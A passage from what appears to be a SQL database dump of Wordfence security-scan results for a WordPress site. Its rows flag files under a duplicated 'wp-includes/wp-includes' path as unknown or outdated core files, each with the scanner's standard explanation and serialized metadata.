version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:54:\"wp-includes/wp-includes/blocks/social-links/block.json\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33716,1631564678,1631564678,'new','knownfile',75,'16b956dde3524d622d562b10f9501cf6','9e51777151a277bb1e0baed4f150ca85','Unknown file in WordPress core: wp-includes/wp-includes/blocks/spacer/block.json','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:48:\"wp-includes/wp-includes/blocks/spacer/block.json\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33717,1631564678,1631564678,'new','knownfile',25,'ede8b5ef4e81224688b953b97832affc','3c5efb684c8f903c8a9a03d2c6777b45','Old WordPress core file not removed during update: wp-includes/wp-includes/blocks/subhead/block.json','This file is in a WordPress core location but is from an older version of WordPress and not used with your current version. Hosting or permissions issues can cause these files to get left behind when WordPress is updated and they should be removed if possible.','a:5:{s:4:\"file\";s:49:\"wp-includes/wp-includes/blocks/subhead/block.json\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33718,1631564678,1631564678,'new','knownfile',75,'ee5c9c5b17c792a861825a25901d2426','6ff8339b3a15a17dfb499901a002ecd3','Unknown file in WordPress core: wp-includes/wp-includes/blocks/table/block.json','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:47:\"wp-includes/wp-includes/blocks/table/block.json\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33719,1631564678,1631564678,'new','knownfile',75,'15b23248bade415285de9e2b6a26b229','9c1be3621a4799f08b49072197f4ebc2','Unknown file in WordPress core: wp-includes/wp-includes/blocks/tag-cloud/block.json','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:51:\"wp-includes/wp-includes/blocks/tag-cloud/block.json\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33720,1631564678,1631564678,'new','knownfile',75,'50a80a202d8bc8ff5734961f84eae607','77ff8a7c9dd0dbafecb99c7e9c85cc56','Unknown file in WordPress core: wp-includes/wp-includes/blocks/tag-cloud.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:44:\"wp-includes/wp-includes/blocks/tag-cloud.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33721,1631564678,1631564678,'new','knownfile',75,'5481fe1778db2259b32cb3a64bbd680a','e78543f8b44acbc044b7dc671d47b2b5','Unknown file in WordPress core: wp-includes/wp-includes/blocks/text-columns/block.json','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:54:\"wp-includes/wp-includes/blocks/text-columns/block.json\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33722,1631564678,1631564678,'new','knownfile',75,'68f2710f779f4357c415ac9669b4ecfe','f6069aa5aa186a02c2342612357b2d0a','Unknown file in WordPress core: wp-includes/wp-includes/blocks/verse/block.json','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:47:\"wp-includes/wp-includes/blocks/verse/block.json\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33723,1631564678,1631564678,'new','knownfile',75,'8a094885b3ad7fce6128cf64bfdcd2bc','129fd6d50b6d1010e847eaf4861a8cf0','Unknown file in WordPress core: wp-includes/wp-includes/blocks/video/block.json','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:47:\"wp-includes/wp-includes/blocks/video/block.json\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33724,1631564678,1631564678,'new','knownfile',75,'7a3071c31772f7b676faf2bbc62c580c','6dd0757edf75a166e4f04a1943b02ffd','Unknown file in WordPress core: wp-includes/wp-includes/blocks.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:34:\"wp-includes/wp-includes/blocks.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33725,1631564678,1631564678,'new','knownfile',75,'de4ee4a6b6267d2a62aa0f2b82d91705','6aba328a7442bce3ea5395a93c358d1f','Unknown file in WordPress core: wp-includes/wp-includes/bookmark-template.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:45:\"wp-includes/wp-includes/bookmark-template.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33726,1631564678,1631564678,'new','knownfile',75,'82cd49f7cc62f2f3e2d03f69f7b82924','7f8327094385e6cfb07c592deb2d718b','Unknown file in WordPress core: wp-includes/wp-includes/bookmark.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:36:\"wp-includes/wp-includes/bookmark.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33727,1631564678,1631564678,'new','knownfile',75,'ed0fc25eea917a84c7665b9cf36dde1c','9f7571c9c889492169da35c48e0fd46b','Unknown file in WordPress core: wp-includes/wp-includes/cache-compat.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:40:\"wp-includes/wp-includes/cache-compat.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33728,1631564678,1631564678,'new','knownfile',75,'5d0a6b6f368473da7d6e921c24cd9a80','882af391390b1a33a2a888a6c5653b1a','Unknown file in WordPress core: wp-includes/wp-includes/cache.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:33:\"wp-includes/wp-includes/cache.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33729,1631564678,1631564678,'new','knownfile',75,'3540dc3f116333dfaf8ab796df2d3a60','aa02c61a6e7049d0cfc0e4f74d0f1322','Unknown file in WordPress core: wp-includes/wp-includes/canonical.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:37:\"wp-includes/wp-includes/canonical.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33730,1631564678,1631564678,'new','knownfile',75,'550ca3f0926edd386572a12b1f9df51c','72b0a43410c8faaf4aecf003515279d4','Unknown file in WordPress core: wp-includes/wp-includes/capabilities.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:40:\"wp-includes/wp-includes/capabilities.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33731,1631564678,1631564678,'new','knownfile',75,'2d132f74d696a581ee7c8099d962dad6','5d2d1c2e2457356063805bd2ebad7244','Unknown file in WordPress core: wp-includes/wp-includes/category-template.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:45:\"wp-includes/wp-includes/category-template.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33732,1631564678,1631564678,'new','knownfile',75,'8680c2b3932d489c45c20be8501bb41b','ba73335a6d3f302fbbb112181fc481b0','Unknown file in WordPress core: wp-includes/wp-includes/category.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:36:\"wp-includes/wp-includes/category.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33733,1631564679,1631564679,'new','knownfile',75,'3254d66277eb8e5ddd926936075899f7','b75ba01554fb38e70af22a053c1471d9','Unknown file in WordPress core: wp-includes/wp-includes/certificates/ca-bundle.crt','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:50:\"wp-includes/wp-includes/certificates/ca-bundle.crt\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33734,1631564679,1631564679,'new','knownfile',75,'3260fcf02a5e2eab66cc67aa3a454db9','90d126aed86fcfaa3a22c7fcc7c2a7f8','Unknown file in WordPress core: wp-includes/wp-includes/class-IXR.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:37:\"wp-includes/wp-includes/class-IXR.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33735,1631564679,1631564679,'new','knownfile',75,'553fe877ebeb1cbf2394271e580dc08a','720547f1496bfba496aeefc1d0de703e','Unknown file in WordPress core: wp-includes/wp-includes/class-feed.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:38:\"wp-includes/wp-includes/class-feed.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33736,1631564679,1631564679,'new','knownfile',75,'fc36520122ac3eb532e672df380895c8','07730b92383f727e7c5dbfc60eb1aefc','Unknown file in WordPress core: wp-includes/wp-includes/class-http.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:38:\"wp-includes/wp-includes/class-http.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33737,1631564679,1631564679,'new','knownfile',75,'fa55726f075733a5d78ce6823e7c763f','c68c3e1334f54b564d4482e995cbd4db','Unknown file in WordPress core: wp-includes/wp-includes/class-json.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:38:\"wp-includes/wp-includes/class-json.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33738,1631564679,1631564679,'new','knownfile',75,'3d228636ad1994375ced8eb47a1c2a67','85990d87a818f77d5f66f690a0099aef','Unknown file in WordPress core: wp-includes/wp-includes/class-oembed.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:40:\"wp-includes/wp-includes/class-oembed.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33739,1631564679,1631564679,'new','knownfile',75,'98ed64b89e4524a461892bbe6c60e98d','26c547fe59fca428473e678629b2be2b','Unknown file in WordPress core: wp-includes/wp-includes/class-phpass.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:40:\"wp-includes/wp-includes/class-phpass.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33740,1631564679,1631564679,'new','knownfile',75,'b7a1e6403b8dfeb0bcc2a17f5a058d7c','d29e002a3c4124c334d904aeaf4878de','Unknown file in WordPress core: wp-includes/wp-includes/class-phpmailer.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:43:\"wp-includes/wp-includes/class-phpmailer.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33741,1631564679,1631564679,'new','knownfile',75,'e1b8e05171c252914d74605ef236e50f','d9bfaa8fa9c0603e0462977ebf6a6a10','Unknown file in WordPress core: wp-includes/wp-includes/class-pop3.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:38:\"wp-includes/wp-includes/class-pop3.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33742,1631564679,1631564679,'new','knownfile',75,'4b1eb5d6c89749afd0fb606fb8e587c3','34b9002f78bed63fdb664d8f5a41b8d8','Unknown file in WordPress core: wp-includes/wp-includes/class-requests.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:42:\"wp-includes/wp-includes/class-requests.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33743,1631564679,1631564679,'new','knownfile',75,'6252e9b0a615f1f251febc13889c4bca','3eab0b9adf0f2aecf5a9fdb2d4daf6da','Unknown file in WordPress core: wp-includes/wp-includes/class-simplepie.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:43:\"wp-includes/wp-includes/class-simplepie.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33744,1631564679,1631564679,'new','knownfile',75,'b88057bcf906b6c794c4b2e469cba183','f783289d8adf6afe0c522cbd96915564','Unknown file in WordPress core: wp-includes/wp-includes/class-smtp.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:38:\"wp-includes/wp-includes/class-smtp.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33745,1631564679,1631564679,'new','knownfile',75,'6f143906918af745b7aa67f3e753ea17','096076bec39178961d28ab3425e7e274','Unknown file in WordPress core: wp-includes/wp-includes/class-snoopy.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:40:\"wp-includes/wp-includes/class-snoopy.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33746,1631564679,1631564679,'new','knownfile',75,'d6c6ef1c4bd0d17915c64b2a6c80881b','b1e5b9cb3c257803cf24f1bb1b510d2f','Unknown file in WordPress core: wp-includes/wp-includes/class-walker-category-dropdown.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:58:\"wp-includes/wp-includes/class-walker-category-dropdown.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33747,1631564679,1631564679,'new','knownfile',75,'d4b7f1fa824009091ca88bc8431c2d5d','ad86a6adfb0bc120ba27e5f25d531ae6','Unknown file in WordPress core: wp-includes/wp-includes/class-walker-category.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:49:\"wp-includes/wp-includes/class-walker-category.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33748,1631564679,1631564679,'new','knownfile',75,'f8db36cf1f202c253cbe365909099ac7','fb0f69e631665e40c09f1bdde5a9a935','Unknown file in WordPress core: wp-includes/wp-includes/class-walker-comment.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:48:\"wp-includes/wp-includes/class-walker-comment.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33749,1631564679,1631564679,'new','knownfile',75,'27bdf3c39551e4629005fc2c701d109f','a59e8b23af4705ad231f00defd5b915d','Unknown file in WordPress core: wp-includes/wp-includes/class-walker-nav-menu.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:49:\"wp-includes/wp-includes/class-walker-nav-menu.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33750,1631564679,1631564679,'new','knownfile',75,'b37a26840312e3b3c18763705f4da3a7','2b8db5b1d57ac84b8b75e8609cbfeeae','Unknown file in WordPress core: wp-includes/wp-includes/class-walker-page-dropdown.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:54:\"wp-includes/wp-includes/class-walker-page-dropdown.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33751,1631564679,1631564679,'new','knownfile',75,'746c77ca0faf6e1e2e4c12d894cdc8ad','3b486dc00b88b8ec3fac499e4516424f','Unknown file in WordPress core: wp-includes/wp-includes/class-walker-page.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:45:\"wp-includes/wp-includes/class-walker-page.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33752,1631564679,1631564679,'new','knownfile',75,'2e66d497e28bc4b0949a77ad9ce109ec','094570aaf6eb960edd131dc70b79b86e','Unknown file in WordPress core: wp-includes/wp-includes/class-wp-admin-bar.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:46:\"wp-includes/wp-includes/class-wp-admin-bar.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33753,1631564679,1631564679,'new','knownfile',75,'0e91757e0c8d50dbed226906331b98e1','29e22428322f9cd0bb8c194b0351691d','Unknown file in WordPress core: wp-includes/wp-includes/class-wp-ajax-response.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:50:\"wp-includes/wp-includes/class-wp-ajax-response.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33754,1631564679,1631564679,'new','knownfile',75,'b419f3f1318db6a80831aac6c974b215','e309e209bd6b1f00fccc9b9dff421520','Unknown file in WordPress core: wp-includes/wp-includes/class-wp-application-passwords.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:58:\"wp-includes/wp-includes/class-wp-application-passwords.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33755,1631564679,1631564679,'new','knownfile',75,'4d6e056decb678c880adaf6e19bd130d','d0a4707b76d96df4f3b9eb174f3088af','Unknown file in WordPress core: wp-includes/wp-includes/class-wp-block-list.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:47:\"wp-includes/wp-includes/class-wp-block-list.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33756,1631564679,1631564679,'new','knownfile',75,'b39d4d31c4ffcfffcc9c187b8d4e2aba','eb25f4a3edc34be447a1c473b875b321','Unknown file in WordPress core: wp-includes/wp-includes/class-wp-block-parser.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a 